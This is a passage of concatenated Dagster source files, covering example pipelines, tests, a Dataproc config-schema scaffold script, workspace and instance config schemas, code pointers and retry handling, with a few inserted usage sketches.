'generate_training_set_and_train_model': lambda: generate_training_set_and_train_model,
'daily_weather_pipeline': lambda: daily_weather_pipeline,
}
}
```
#### File: dagster_examples/dagster_pandas_guide/core_trip_pipeline.py
```python
from datetime import datetime
from dagster_pandas import PandasColumn, create_dagster_pandas_dataframe_type
from pandas import DataFrame, read_csv
from dagster import OutputDefinition, pipeline, solid
from dagster.utils import script_relative_path
TripDataFrame = create_dagster_pandas_dataframe_type(
name='TripDataFrame',
columns=[
PandasColumn.integer_column('bike_id', min_value=0),
PandasColumn.categorical_column('color', categories={'red', 'green', 'blue'}),
PandasColumn.datetime_column(
'start_time', min_datetime=datetime(year=2020, month=2, day=10)
),
PandasColumn.datetime_column('end_time', min_datetime=datetime(year=2020, month=2, day=10)),
PandasColumn.string_column('station'),
PandasColumn.exists('amount_paid'),
PandasColumn.boolean_column('was_member'),
],
)
@solid(output_defs=[OutputDefinition(name='trip_dataframe', dagster_type=TripDataFrame)])
def load_trip_dataframe(_) -> DataFrame:
return read_csv(
script_relative_path('./ebike_trips.csv'),
parse_dates=['start_time', 'end_time'],
date_parser=lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S.%f'),
)
@pipeline
def trip_pipeline():
load_trip_dataframe()
```
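A minimal sketch of running the pipeline above in-process with Dagster's Python API of this era (`execute_pipeline`); it assumes `ebike_trips.csv` sits next to the module and that the package path matches the repo layout:
```python
from dagster import execute_pipeline

from dagster_examples.dagster_pandas_guide.core_trip_pipeline import trip_pipeline

# Executes the single-solid pipeline; the loaded frame is validated against
# the TripDataFrame type attached to the solid's output.
result = execute_pipeline(trip_pipeline)
print(result.success)
```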
#### File: dagster_examples/dagster_pandas_guide/repository.py
```python
from dagster import repository
from .core_trip_pipeline import trip_pipeline
from .custom_column_constraint_pipeline import custom_column_constraint_pipeline
from .shape_constrained_pipeline import shape_constrained_pipeline
from .summary_stats_pipeline import summary_stats_pipeline
@repository
def dagster_pandas_guide_examples():
return {
'pipelines': {
'custom_column_constraint_pipeline': lambda: custom_column_constraint_pipeline,
'shape_constrained_pipeline': lambda: shape_constrained_pipeline,
'summary_stats_pipeline': lambda: summary_stats_pipeline,
'trip_pipeline': lambda: trip_pipeline,
}
}
```
#### File: dagster_examples/stocks/schedules.py
```python
import datetime
from dagster.core.definitions.decorators import monthly_schedule
@monthly_schedule(
pipeline_name='compute_total_stock_volume', start_date=datetime.datetime(2018, 1, 1),
)
def daily_stock_schedule(date):
previous_month_last_day = date - datetime.timedelta(days=1)
previous_month_first_day = previous_month_last_day.replace(day=1)
return {
'solids': {
'get_stock_data': {
'config': {
'ds_start': previous_month_first_day.strftime("%Y-%m-%d"),
'ds_end': previous_month_last_day.strftime("%Y-%m-%d"),
'symbol': 'AAPL',
}
}
}
}
def define_schedules():
return [daily_stock_schedule]
```
#### File: examples/dagster_examples_tests/test_examples.py
```python
from __future__ import print_function
import os
import yaml
from click.testing import CliRunner
from dagster import seven
from dagster.api.launch_scheduled_execution import sync_launch_scheduled_execution
from dagster.cli.pipeline import execute_list_command, pipeline_list_command
from dagster.core.definitions.reconstructable import ReconstructableRepository
from dagster.core.scheduler import ScheduledExecutionSuccess
from dagster.core.test_utils import environ
from dagster.utils import file_relative_path, script_relative_path
def no_print(_):
return None
def test_list_command():
runner = CliRunner()
execute_list_command(
{
'repository_yaml': script_relative_path('../repository.yaml'),
'python_file': None,
'module_name': None,
'fn_name': None,
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-w', script_relative_path('../repository.yaml')]
)
assert result.exit_code == 0
def test_schedules():
with seven.TemporaryDirectory() as temp_dir:
with environ({'DAGSTER_HOME': temp_dir}):
with open(os.path.join(temp_dir, 'dagster.yaml'), 'w') as fd:
yaml.dump(
{
'scheduler': {
'module': 'dagster.utils.test',
'class': 'FilesystemTestScheduler',
'config': {'base_dir': temp_dir},
}
},
fd,
default_flow_style=False,
)
recon_repo = ReconstructableRepository.from_legacy_repository_yaml(
file_relative_path(__file__, '../repository.yaml')
)
for schedule_name in [
'many_events_every_min',
'pandas_hello_world_hourly',
]:
schedule = recon_repo.get_reconstructable_schedule(schedule_name)
result = sync_launch_scheduled_execution(schedule.get_origin())
assert isinstance(result, ScheduledExecutionSuccess)
```
#### File: dagster_examples/toys/tree_demo.py
```python
import time
from collections import defaultdict
from random import randint
from dagster import (
DependencyDefinition,
InputDefinition,
Output,
OutputDefinition,
PipelineDefinition,
SolidDefinition,
check,
)
def generate_solid(solid_id, num_outputs):
def compute_fn(_context, _parent):
time.sleep(float(randint(0, 100)) / 1000)
for i in range(num_outputs):
yield Output(i, 'out_{}'.format(i))
return SolidDefinition(
name=solid_id,
input_defs=[InputDefinition(name='parent')],
output_defs=[OutputDefinition(name='out_{}'.format(i)) for i in range(num_outputs)],
compute_fn=compute_fn,
)
def generate_tree(name, branch_factor, depth):
"""
This function generates a pipeline definition which consists of solids that are arranged in a balanced tree.
The compute functions in all of these solids sleep for a random interval and yield a integer to their corresponding
outputs.
Args:
name (str): The name of the pipeline.
branch_factor (int): the number of output branches for any non-leaf node.
depth (int): depth of the tree.
"""
check.str_param(name, 'name')
check.int_param(branch_factor, 'branch_factor')
check.int_param(depth, 'depth')
node_counter = 0
leaves = [generate_solid('{}_solid'.format(node_counter), branch_factor)]
node_counter += 1
level = 0
deps = defaultdict(dict)
solids = []
while level != depth:
num_iterations = branch_factor ** level
for _ in range(num_iterations):
solid_to_connect = leaves.pop()
solids.append(solid_to_connect)
for output in solid_to_connect.output_defs:
new_output_solid = generate_solid('{}_solid'.format(node_counter), branch_factor)
node_counter += 1
deps[new_output_solid.name]['parent'] = DependencyDefinition(
solid_to_connect.name, output.name
)
leaves = [new_output_solid] + leaves
level += 1
solids += leaves
return PipelineDefinition(name=name, solid_defs=solids, dependencies=deps)
```
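A short sketch of exercising `generate_tree`; the branch factor and depth are illustrative, and the import assumes the `dagster_examples` package is installed as in the repo:
```python
from dagster_examples.toys.tree_demo import generate_tree

# Each non-leaf solid fans out into `branch_factor` children; with branch_factor=2
# and depth=3 the pipeline holds 1 + 2 + 4 + 8 = 15 solids.
pipeline = generate_tree("demo_tree", branch_factor=2, depth=3)
print(pipeline.name)  # demo_tree
```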
#### File: automation/automation/parse_dataproc_configs.py
```python
from __future__ import print_function
import os
import pprint
from collections import namedtuple
import requests
from .printer import IndentingBufferPrinter
SCALAR_TYPES = {
'string': 'String',
'boolean': 'Bool',
'number': 'Int',
'enumeration': 'String',
'integer': 'Int',
}
class List(object):
def __init__(self, inner_type):
self.inner_type = inner_type
class Enum(object):
def __init__(self, name, enum_names, enum_descriptions):
self.name = name
self.enum_names = enum_names
self.enum_descriptions = enum_descriptions
def write(self, printer):
printer.line(self.name.title() + ' = Enum(')
with printer.with_indent():
printer.line('name=\'{}\','.format(self.name.title()))
printer.line('enum_values=[')
with printer.with_indent():
if self.enum_descriptions:
for name, value in zip(self.enum_names, self.enum_descriptions):
prefix = 'EnumValue(\'{}\', description=\'\'\''.format(name)
printer.block(value + '\'\'\'),', initial_indent=prefix)
else:
for name in self.enum_names:
printer.line('EnumValue(\'{}\'),'.format(name))
printer.line('],')
printer.line(')')
class Field(object):
'''Field represents a field type that we're going to write out as a dagster config field, once
we've pre-processed all custom types
'''
def __init__(self, fields, is_required, description):
self.fields = fields
self.is_required = is_required
self.description = description
def __repr__(self):
return 'Field(%s, %s, %s)' % (
pprint.pformat(self.fields),
str(self.is_required),
self.description,
)
def _print_fields(self, printer):
# Scalars
if isinstance(self.fields, str):
printer.append(self.fields)
# Enums
elif isinstance(self.fields, Enum):
printer.append(self.fields.name)
# Lists
elif isinstance(self.fields, List):
printer.append('[')
self.fields.inner_type.write(printer, field_wrapped=False)
printer.append(']')
# Dicts
else:
printer.line('Shape(')
with printer.with_indent():
printer.line('fields={')
with printer.with_indent():
for (k, v) in self.fields.items():
# We need to skip "output" fields which are API responses, not queries
if 'Output only' in v.description:
continue
# This v is a terminal scalar type, print directly
if isinstance(v, str):
printer.line("'{}': {},".format(k, v))
# Recurse nested fields
else:
with printer.with_indent():
printer.append("'{}': ".format(k))
v.write(printer)
printer.append(',')
printer.line('},')
printer.line(')')
def write(self, printer, field_wrapped=True):
'''Use field_wrapped=False for Lists that should not be wrapped in Field()
'''
if not field_wrapped:
self._print_fields(printer)
return printer.read()
printer.append('Field(')
printer.line('')
with printer.with_indent():
self._print_fields(printer)
printer.append(',')
# Print description
if self.description:
printer.block(
self.description.replace("'", "\\'") + "''',", initial_indent="description='''"
)
# Print is_required=True/False if defined; if not defined, default to True
printer.line(
'is_required=%s,' % str(self.is_required if self.is_required is not None else True)
)
printer.line(')')
return printer.read()
class ParsedConfig(namedtuple('_ParsedConfig', 'name configs enums')):
def __new__(cls, name, configs, enums):
return super(ParsedConfig, cls).__new__(cls, name, configs, enums)
def write_configs(self, base_path):
configs_filename = 'configs_%s.py' % self.name
print('Writing', configs_filename)
with open(os.path.join(base_path, configs_filename), 'wb') as f:
f.write(self.configs)
enums_filename = 'types_%s.py' % self.name
with open(os.path.join(base_path, enums_filename), 'wb') as f:
f.write(self.enums)
class ConfigParser(object):
def __init__(self, schemas):
self.schemas = schemas
# Stashing these in a global so that we can write out after we're done constructing configs
self.all_enums = {}
def extract_config(self, base_field, suffix):
with IndentingBufferPrinter() as printer:
printer.write_header()
printer.line('from dagster import Bool, Field, Int, Permissive, Shape, String')
printer.blank_line()
# Optionally write enum includes
if self.all_enums:
printer.line(
'from .types_{} import {}'.format(suffix, ', '.join(self.all_enums.keys()))
)
printer.blank_line()
printer.line('def define_%s_config():' % suffix)
with printer.with_indent():
printer.append('return ')
base_field.write(printer)
return printer.read().strip().encode()
def extract_enums(self):
if not self.all_enums:
return
with IndentingBufferPrinter() as printer:
printer.write_header()
printer.line('from dagster import Enum, EnumValue')
printer.blank_line()
for enum in self.all_enums:
self.all_enums[enum].write(printer)
printer.blank_line()
return printer.read().strip().encode()
def parse_object(self, obj, name=None, depth=0, enum_descriptions=None):
# This is a reference to another object that we should substitute by recursing
if '$ref' in obj:
name = obj['$ref']
return self.parse_object(self.schemas.get(name), name, depth + 1)
# Print type tree
prefix = '|' + ('-' * 4 * depth) + ' ' if depth > 0 else ''
print(prefix + (name or obj.get('type')))
# Switch on object type
obj_type = obj.get('type')
# Handle enums
if 'enum' in obj:
            # This appears to be a bug in the API JSON spec: for type "Component", the enum
            # descriptions sit one level higher than they should and the name is missing
if name is None:
name = 'Component'
enum = Enum(name, obj['enum'], enum_descriptions or obj.get('enumDescriptions'))
self.all_enums[name] = enum
fields = enum
# Handle dicts / objects
elif obj_type == 'object':
# This is a generic k:v map
if 'additionalProperties' in obj:
fields = 'Permissive()'
else:
fields = {
k: self.parse_object(v, k, depth + 1) for k, v in obj['properties'].items()
}
# Handle arrays
elif obj_type == 'array':
fields = List(
self.parse_object(
obj.get('items'), None, depth + 1, enum_descriptions=obj.get('enumDescriptions')
)
)
# Scalars
elif obj_type in SCALAR_TYPES:
fields = SCALAR_TYPES.get(obj_type)
# Should never get here
else:
            raise Exception('unknown type: {}'.format(obj))
return Field(fields, is_required=None, description=obj.get('description'))
def extract_schema_for_object(self, object_name, name):
# Reset enums for this object
self.all_enums = {}
obj = self.parse_object(self.schemas.get(object_name), object_name)
return ParsedConfig(
name=name, configs=self.extract_config(obj, name), enums=self.extract_enums()
)
def main():
api_url = 'https://www.googleapis.com/discovery/v1/apis/dataproc/v1/rest'
base_path = '../libraries/dagster-gcp/dagster_gcp/dataproc/'
json_schema = requests.get(api_url).json().get('schemas')
c = ConfigParser(json_schema)
parsed = c.extract_schema_for_object('Job', 'dataproc_job')
parsed.write_configs(base_path)
parsed = c.extract_schema_for_object('ClusterConfig', 'dataproc_cluster')
parsed.write_configs(base_path)
if __name__ == '__main__':
main()
```
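The schema walker above turns Google API discovery JSON into nested `Field`/`List`/`Enum` values before printing them out as dagster config. A minimal sketch of that mapping, using a hypothetical schema fragment (the object and property names are assumptions, not taken from the Dataproc API) and assuming it runs in the same module as the scaffold script above:
```python
# Hypothetical discovery-style schema fragment.
schemas = {
    'Cluster': {
        'type': 'object',
        'description': 'A made-up cluster object.',
        'properties': {
            'clusterName': {'type': 'string', 'description': 'Required. The cluster name.'},
            'labels': {'type': 'object', 'additionalProperties': {'type': 'string'}},
        },
    }
}
parser = ConfigParser(schemas)
field = parser.parse_object(schemas['Cluster'], 'Cluster')
# field.fields maps property names to nested Fields: 'clusterName' resolves to the scalar
# 'String', and the 'labels' map (additionalProperties) becomes a Field wrapping 'Permissive()'.
print(field)
```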
#### File: dagster/api/execute_run.py
```python
from dagster import check
from dagster.core.events import EngineEventData
from dagster.core.instance import DagsterInstance
from dagster.core.origin import PipelinePythonOrigin
from dagster.core.storage.pipeline_run import PipelineRun
from dagster.serdes.ipc import ipc_read_event_stream, open_ipc_subprocess, write_unary_input
from dagster.utils import safe_tempfile_path
def cli_api_execute_run(output_file, instance, pipeline_origin, pipeline_run):
check.str_param(output_file, 'output_file')
check.inst_param(instance, 'instance', DagsterInstance)
check.inst_param(pipeline_origin, 'pipeline_origin', PipelinePythonOrigin)
check.inst_param(pipeline_run, 'pipeline_run', PipelineRun)
from dagster.cli.api import ExecuteRunArgs, ExecuteRunArgsLoadComplete
with safe_tempfile_path() as input_file:
write_unary_input(
input_file,
ExecuteRunArgs(
pipeline_origin=pipeline_origin,
pipeline_run_id=pipeline_run.run_id,
instance_ref=instance.get_ref(),
),
)
parts = [
pipeline_origin.executable_path,
'-m',
'dagster',
'api',
'execute_run',
input_file,
output_file,
]
instance.report_engine_event(
'About to start process for pipeline "{pipeline_name}" (run_id: {run_id}).'.format(
pipeline_name=pipeline_run.pipeline_name, run_id=pipeline_run.run_id
),
pipeline_run,
engine_event_data=EngineEventData(marker_start='cli_api_subprocess_init'),
)
process = open_ipc_subprocess(parts)
# we need to process this event in order to ensure that the called process loads the input
event = next(ipc_read_event_stream(output_file))
check.inst(event, ExecuteRunArgsLoadComplete)
return process
```
#### File: dagster/api/list_repositories.py
```python
from dagster import check
from .utils import execute_unary_api_cli_command
def sync_list_repositories(executable_path, python_file, module_name):
from dagster.cli.api import ListRepositoriesResponse, ListRepositoriesInput
return check.inst(
execute_unary_api_cli_command(
executable_path,
'list_repositories',
ListRepositoriesInput(module_name=module_name, python_file=python_file),
),
ListRepositoriesResponse,
)
```
#### File: dagster/api/snapshot_partition.py
```python
from dagster import check
from dagster.core.host_representation.external_data import ExternalPartitionData
from dagster.core.host_representation.handle import RepositoryHandle
from .utils import execute_unary_api_cli_command
def sync_get_external_partition(repository_handle, partition_set_name, partition_name):
from dagster.cli.api import PartitionApiCommandArgs
check.inst_param(repository_handle, 'repository_handle', RepositoryHandle)
check.str_param(partition_set_name, 'partition_set_name')
check.str_param(partition_name, 'partition_name')
repository_origin = repository_handle.get_origin()
return check.inst(
execute_unary_api_cli_command(
repository_origin.executable_path,
'partition',
PartitionApiCommandArgs(
repository_origin=repository_origin,
partition_set_name=partition_set_name,
partition_name=partition_name,
),
),
ExternalPartitionData,
)
```
#### File: cli/workspace/config_schema.py
```python
from dagster import check
from dagster.config import Field, ScalarUnion, Selector, validate_config
from dagster.core.errors import DagsterInvalidConfigError
from dagster.utils import merge_dicts
def validate_workspace_config(workspace_config):
check.dict_param(workspace_config, 'workspace_config')
return validate_config(WORKSPACE_CONFIG_SCHEMA_WITH_LEGACY, workspace_config)
def ensure_workspace_config(workspace_config, yaml_path):
check.dict_param(workspace_config, 'workspace_config')
check.str_param(yaml_path, 'yaml_path')
validation_result = validate_workspace_config(workspace_config)
if not validation_result.success:
raise DagsterInvalidConfigError(
'Errors while loading workspace config at {}.'.format(yaml_path),
validation_result.errors,
workspace_config,
)
return validation_result
def _get_target_config():
return {
'python_file': ScalarUnion(
scalar_type=str,
non_scalar_schema={
'relative_path': str,
'attribute': Field(str, is_required=False),
'location_name': Field(str, is_required=False),
},
),
'python_module': ScalarUnion(
scalar_type=str,
non_scalar_schema={
'module_name': str,
'attribute': Field(str, is_required=False),
'location_name': Field(str, is_required=False),
},
),
}
WORKSPACE_CONFIG_SCHEMA = {
'load_from': [
Selector(
merge_dicts(
_get_target_config(),
{
'python_environment': {
'executable_path': str,
'target': Selector(_get_target_config()),
},
},
)
)
],
}
WORKSPACE_CONFIG_SCHEMA_WITH_LEGACY = Selector(
merge_dicts(
{
'repository': {
'module': Field(str, is_required=False),
'file': Field(str, is_required=False),
'fn': Field(str),
},
},
WORKSPACE_CONFIG_SCHEMA,
)
)
```
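As a rough illustration of the selector-based schema above (the file and module names here are placeholders, not taken from the repo), a workspace config that selects one target per entry validates like this:
```python
# Module path assumed from the file header above.
from dagster.cli.workspace.config_schema import validate_workspace_config
workspace_config = {
    'load_from': [
        {'python_file': 'repo.py'},
        {'python_module': {'module_name': 'my_pkg.repos', 'attribute': 'my_repository'}},
    ]
}
result = validate_workspace_config(workspace_config)
assert result.success  # each list entry selects exactly one of the target options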
#### File: cli/workspace/workspace.py
```python
from dagster import check
from dagster.core.host_representation import RepositoryLocationHandle
class Workspace:
def __init__(self, repository_location_handles):
check.list_param(
repository_location_handles,
'repository_location_handles',
of_type=RepositoryLocationHandle,
)
self._location_handle_dict = {rlh.location_name: rlh for rlh in repository_location_handles}
@property
def repository_location_handles(self):
return list(self._location_handle_dict.values())
@property
def repository_location_names(self):
return list(self._location_handle_dict.keys())
def has_repository_location_handle(self, location_name):
check.str_param(location_name, 'location_name')
return location_name in self._location_handle_dict
def get_repository_location_handle(self, location_name):
check.str_param(location_name, 'location_name')
return self._location_handle_dict[location_name]
```
#### File: dagster/config/evaluate_value_result.py
```python
from collections import namedtuple
from dagster import check
from .errors import EvaluationError
class EvaluateValueResult(namedtuple('_EvaluateValueResult', 'success value errors')):
def __new__(cls, success, value, errors):
return super(EvaluateValueResult, cls).__new__(
cls,
check.opt_bool_param(success, 'success'),
value,
check.opt_list_param(errors, 'errors', of_type=EvaluationError),
)
@staticmethod
def for_error(error):
return EvaluateValueResult(False, None, [error])
@staticmethod
def for_errors(errors):
return EvaluateValueResult(False, None, errors)
@staticmethod
def for_value(value):
return EvaluateValueResult(True, value, None)
def errors_at_level(self, *levels):
return list(self._iterate_errors_at_level(list(levels)))
def _iterate_errors_at_level(self, levels):
check.list_param(levels, 'levels', of_type=str)
for error in self.errors:
if error.stack.levels == levels:
yield error
```
#### File: dagster/core/code_pointer.py
```python
import importlib
import inspect
import os
import sys
from abc import ABCMeta, abstractmethod
from collections import namedtuple
import six
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.serdes import whitelist_for_serdes
from dagster.seven import import_module_from_path
from dagster.utils import load_yaml_from_path
class CodePointer(six.with_metaclass(ABCMeta)):
@abstractmethod
def load_target(self):
pass
@abstractmethod
def describe(self):
pass
@staticmethod
def from_module(module_name, definition):
check.str_param(module_name, 'module_name')
check.str_param(definition, 'definition')
return ModuleCodePointer(module_name, definition)
@staticmethod
def from_python_file(python_file, definition):
check.str_param(python_file, 'python_file')
check.str_param(definition, 'definition')
return FileCodePointer(python_file=python_file, fn_name=definition)
@staticmethod
def from_legacy_repository_yaml(file_path):
check.str_param(file_path, 'file_path')
config = load_yaml_from_path(file_path)
repository_config = check.dict_elem(config, 'repository')
module_name = check.opt_str_elem(repository_config, 'module')
file_name = check.opt_str_elem(repository_config, 'file')
fn_name = check.str_elem(repository_config, 'fn')
return (
CodePointer.from_module(module_name, fn_name)
if module_name
# rebase file in config off of the path in the config file
else CodePointer.from_python_file(rebase_file(file_name, file_path), fn_name)
)
def rebase_file(relative_path_in_file, file_path_resides_in):
'''
In config files, you often put file paths that are meant to be relative
to the location of that config file. This does that calculation.
'''
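    # Illustrative only (paths are assumptions, not from the original source):
    #   rebase_file('repos/my_repo.py', '/home/user/project/workspace.yaml')
    #   returns '/home/user/project/repos/my_repo.py'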
check.str_param(relative_path_in_file, 'relative_path_in_file')
check.str_param(file_path_resides_in, 'file_path_resides_in')
return os.path.join(
os.path.dirname(os.path.abspath(file_path_resides_in)), relative_path_in_file
)
def load_python_file(python_file):
'''
Takes a path to a python file and returns a loaded module
'''
check.str_param(python_file, 'python_file')
module_name = os.path.splitext(os.path.basename(python_file))[0]
return import_module_from_path(module_name, python_file)
@whitelist_for_serdes
class FileCodePointer(namedtuple('_FileCodePointer', 'python_file fn_name'), CodePointer):
def __new__(cls, python_file, fn_name):
return super(FileCodePointer, cls).__new__(
cls, check.str_param(python_file, 'python_file'), check.str_param(fn_name, 'fn_name'),
)
def load_target(self):
module = load_python_file(self.python_file)
if not hasattr(module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found at module scope in file {file}.'.format(
name=self.fn_name, file=self.python_file
)
)
return getattr(module, self.fn_name)
def describe(self):
return '{self.python_file}::{self.fn_name}'.format(self=self)
def get_cli_args(self):
return '-f {python_file} -a {fn_name}'.format(
python_file=os.path.abspath(os.path.expanduser(self.python_file)), fn_name=self.fn_name
)
@whitelist_for_serdes
class ModuleCodePointer(namedtuple('_ModuleCodePointer', 'module fn_name'), CodePointer):
def __new__(cls, module, fn_name):
return super(ModuleCodePointer, cls).__new__(
cls, check.str_param(module, 'module'), check.str_param(fn_name, 'fn_name')
)
def load_target(self):
module = importlib.import_module(self.module)
if not hasattr(module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found in module {module}. dir: {dir}'.format(
name=self.fn_name, module=self.module, dir=dir(module)
)
)
return getattr(module, self.fn_name)
def describe(self):
return 'from {self.module} import {self.fn_name}'.format(self=self)
def get_cli_args(self):
return '-m {module} -a {fn_name}'.format(module=self.module, fn_name=self.fn_name)
def get_python_file_from_previous_stack_frame():
'''inspect.stack() lets us introspect the call stack; inspect.stack()[1] is the previous
stack frame.
    In Python < 3.5, this is just a tuple, and the python file of the previous frame is the
    element at index 1.
    In Python 3.5+, this is a FrameInfo namedtuple instance; the python file of the previous frame
    remains the element at index 1.
'''
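    # Illustrative only (the path is an assumption): when a user module at
    # /home/user/project/repo.py calls a dagster API function that in turn calls this helper,
    # the helper returns the absolute path '/home/user/project/repo.py'.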
# Since this is now a function in this file, we need to go back two hops to find the
# callsite file.
previous_stack_frame = inspect.stack(0)[2]
# See: https://docs.python.org/3/library/inspect.html
if sys.version_info.major == 3 and sys.version_info.minor >= 5:
check.inst(previous_stack_frame, inspect.FrameInfo)
else:
check.inst(previous_stack_frame, tuple)
python_file = previous_stack_frame[1]
return os.path.abspath(python_file)
```
#### File: core/execution/config.py
```python
import multiprocessing
from abc import ABCMeta, abstractmethod
import six
from dagster import check
from dagster.core.definitions.reconstructable import ReconstructablePipeline
from dagster.core.execution.retries import Retries
class ExecutorConfig(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
@abstractmethod
def get_engine(self):
'''Get the configured engine.
Returns:
Engine: The configured engine.'''
class InProcessExecutorConfig(ExecutorConfig):
def __init__(self, retries, marker_to_close):
self.retries = check.inst_param(retries, 'retries', Retries)
self.marker_to_close = check.opt_str_param(marker_to_close, 'marker_to_close')
def get_engine(self):
from dagster.core.engine.engine_inprocess import InProcessEngine
return InProcessEngine
class MultiprocessExecutorConfig(ExecutorConfig):
def __init__(self, pipeline, retries, max_concurrent=None):
self.pipeline = check.inst_param(pipeline, 'pipeline', ReconstructablePipeline)
self.retries = check.inst_param(retries, 'retries', Retries)
max_concurrent = max_concurrent if max_concurrent else multiprocessing.cpu_count()
self.max_concurrent = check.int_param(max_concurrent, 'max_concurrent')
def get_engine(self):
from dagster.core.engine.engine_multiprocess import MultiprocessEngine
return MultiprocessEngine
```
#### File: execution/plan/local_external_step_main.py
```python
import os
import pickle
import sys
from dagster.core.execution.plan.external_step import PICKLED_EVENTS_FILE_NAME, run_step_from_ref
from dagster.core.storage.file_manager import LocalFileHandle, LocalFileManager
def main(step_run_ref_path):
file_manager = LocalFileManager('.')
file_handle = LocalFileHandle(step_run_ref_path)
step_run_ref = pickle.loads(file_manager.read_data(file_handle))
events = list(run_step_from_ref(step_run_ref))
events_out_path = os.path.join(os.path.dirname(step_run_ref_path), PICKLED_EVENTS_FILE_NAME)
with open(events_out_path, 'wb') as events_file:
pickle.dump(events, events_file)
if __name__ == '__main__':
main(sys.argv[1])
```
#### File: core/execution/retries.py
```python
from collections import defaultdict
from enum import Enum
from dagster import Field, Selector, check
def get_retries_config():
return Field(
Selector({'enabled': {}, 'disabled': {}}), is_required=False, default_value={'enabled': {}},
)
class RetryMode(Enum):
ENABLED = 'enabled'
DISABLED = 'disabled'
    # Designed for use when inner plan execution happens within an "orchestrator" engine such as
    # multiprocess: up_for_retry steps are not directly re-enqueued, deferring that to the engine.
DEFERRED = 'deferred'
class Retries:
def __init__(self, mode, previous_attempts=None):
self._mode = check.inst_param(mode, 'mode', RetryMode)
self._attempts = defaultdict(int)
for key, val in check.opt_dict_param(
previous_attempts, 'previous_attempts', key_type=str, value_type=int
).items():
self._attempts[key] = val
@property
def enabled(self):
return self._mode == RetryMode.ENABLED
@property
def disabled(self):
return self._mode == RetryMode.DISABLED
@property
def deferred(self):
return self._mode == RetryMode.DEFERRED
def get_attempt_count(self, key):
return self._attempts[key]
def mark_attempt(self, key):
self._attempts[key] += 1
def for_inner_plan(self):
if self.disabled:
return self
elif self.enabled:
return Retries(mode=RetryMode.DEFERRED, previous_attempts=dict(self._attempts))
else:
check.failed('Can not create Retries for inner plan when already in deferred mode')
@staticmethod
def from_config(config_value):
for selector, value in config_value.items():
return Retries(RetryMode(selector), value.get('previous_attempts'))
def to_config(self):
value = {self._mode.value: {}}
if self.deferred:
value[self._mode.value] = {'previous_attempts': dict(self._attempts)}
return value
@staticmethod
def disabled_mode():
return Retries(RetryMode.DISABLED)
```
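A minimal sketch (the step key and attempt count are illustrative, not from the original tests) of the config round trip defined above: enabled mode is downgraded to deferred for the inner plan, carrying previous attempts along.
```python
from dagster.core.execution.retries import Retries
retries = Retries.from_config({'enabled': {}})
assert retries.enabled
retries.mark_attempt('solid_a.compute')
inner = retries.for_inner_plan()  # enabled -> deferred, attempt counts copied over
assert inner.deferred
assert inner.to_config() == {'deferred': {'previous_attempts': {'solid_a.compute': 1}}}
```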
#### File: core/instance/config.py
```python
import os
from dagster import Bool, Int, check
from dagster.config import Field, Permissive
from dagster.config.validate import validate_config
from dagster.core.errors import DagsterInvalidConfigError
from dagster.utils import merge_dicts
from dagster.utils.yaml_utils import load_yaml_from_globs
DAGSTER_CONFIG_YAML_FILENAME = "dagster.yaml"
def dagster_instance_config(base_dir, config_filename=DAGSTER_CONFIG_YAML_FILENAME, overrides=None):
overrides = check.opt_dict_param(overrides, 'overrides')
dagster_config_dict = merge_dicts(
load_yaml_from_globs(os.path.join(base_dir, config_filename)), overrides
)
dagster_config = validate_config(dagster_instance_config_schema(), dagster_config_dict)
if not dagster_config.success:
raise DagsterInvalidConfigError(
'Errors whilst loading dagster instance config at {}.'.format(config_filename),
dagster_config.errors,
dagster_config_dict,
)
return dagster_config.value
def config_field_for_configurable_class():
return Field({'module': str, 'class': str, 'config': Field(Permissive())}, is_required=False)
def dagster_instance_config_schema():
return {
'local_artifact_storage': config_field_for_configurable_class(),
'compute_logs': config_field_for_configurable_class(),
'run_storage': config_field_for_configurable_class(),
'event_log_storage': config_field_for_configurable_class(),
'schedule_storage': config_field_for_configurable_class(),
'scheduler': config_field_for_configurable_class(),
'run_launcher': config_field_for_configurable_class(),
'dagit': Field(
{
'execution_manager': Field(
{
'disabled': Field(Bool, is_required=False),
'max_concurrent_runs': Field(Int, is_required=False),
},
is_required=False,
),
},
is_required=False,
),
'telemetry': Field({'enabled': Field(Bool, default_value=True, is_required=False)}),
}
```
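A rough illustration of the instance schema above (the module, class, and config values are placeholders, not real dagster classes), assuming the module path follows the file header:
```python
from dagster.config.validate import validate_config
from dagster.core.instance.config import dagster_instance_config_schema  # path assumed
instance_overrides = {
    'run_storage': {
        'module': 'my_dagster_plugins.storage',  # placeholder module
        'class': 'MyRunStorage',                 # placeholder class
        'config': {'base_dir': '/tmp/dagster'},
    },
    'telemetry': {'enabled': False},
}
result = validate_config(dagster_instance_config_schema(), instance_overrides)
assert result.success
```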
#### File: core/storage/type_storage.py
```python
from abc import ABCMeta, abstractmethod
import six
from dagster import check
class TypeStoragePlugin(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
'''Base class for storage plugins.
Extend this class for (system_storage_name, dagster_type) pairs that need special handling.
'''
@classmethod
@abstractmethod
    def compatible_with_storage_def(cls, system_storage_def):
raise NotImplementedError()
@classmethod
@abstractmethod
def set_object(cls, intermediate_store, obj, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
@abstractmethod
def get_object(cls, intermediate_store, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
def required_resource_keys(cls):
return frozenset()
class TypeStoragePluginRegistry(object):
def __init__(self, types_to_register):
from dagster.core.types.dagster_type import DagsterType
types_to_register = check.opt_list_param(types_to_register, 'types_to_register', tuple)
self._registry = {}
for type_to_register, type_storage_plugin in types_to_register:
check.inst(type_to_register, DagsterType)
check.subclass(type_storage_plugin, TypeStoragePlugin)
self.register_type(type_to_register, type_storage_plugin)
def register_type(self, type_to_register, type_storage_plugin):
from dagster.core.types.dagster_type import DagsterType
check.inst_param(type_to_register, 'type_to_register', DagsterType)
check.subclass_param(type_storage_plugin, 'type_storage_plugin', TypeStoragePlugin)
check.invariant(
type_to_register.name is not None,
'Cannot register a type storage plugin for an anonymous type',
)
self._registry[type_to_register.name] = type_storage_plugin
def is_registered(self, dagster_type):
if dagster_type.name is not None and dagster_type.name in self._registry:
return True
return False
def get(self, name):
return self._registry.get(name)
def check_for_unsupported_composite_overrides(self, dagster_type):
from dagster.core.types.dagster_type import DagsterTypeKind
composite_overrides = {t.name for t in dagster_type.inner_types if t.name in self._registry}
if composite_overrides:
outer_type = 'composite type'
